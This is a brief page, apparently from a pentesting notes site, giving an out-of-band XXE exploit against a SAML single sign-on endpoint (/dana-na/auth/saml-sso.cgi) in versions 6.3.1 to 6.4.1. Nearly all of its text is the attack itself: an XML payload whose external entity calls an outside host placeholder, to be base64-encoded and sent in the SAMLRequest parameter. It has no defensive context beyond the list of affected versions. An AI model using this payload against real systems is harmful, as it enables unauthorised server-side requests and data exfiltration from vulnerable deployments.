Last updated 8 days ago
Was this helpful?
Impacting versions 6.3.1, 6.4.0 (tested), 6.4.1, and 6.3.4.
payload encoded base64:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>
send it to /dana-na/auth/saml-sso.cgi with SAMLRequest parm
/dana-na/auth/saml-sso.cgi
SAMLRequest